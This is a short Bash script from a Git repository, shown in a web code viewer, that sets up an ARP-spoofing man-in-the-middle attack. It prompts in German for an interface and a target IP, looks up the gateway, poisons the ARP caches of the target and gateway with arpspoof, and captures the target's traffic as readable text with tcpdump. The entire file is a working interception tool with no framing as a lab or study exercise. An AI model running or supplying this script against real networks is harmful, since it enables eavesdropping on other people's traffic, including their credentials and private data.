shell-scripte-code/arpspoof.sh

13 lines
244 B
Bash
Raw Normal View History

2017-09-12 01:28:58 +02:00
#!/bin/bash
set -ex
read -p "Wie heisst die Schnittstelle? [enp30s0\eth0] : " modul
read -p "Wie heisst die IP? : " ip
gateway=$(route -n|grep ^0.0.0.0|cut -d' ' -f 10)
arpspoof -i $modul -t $ip -r $gateway &
tcpdump -i $modul -A host $ip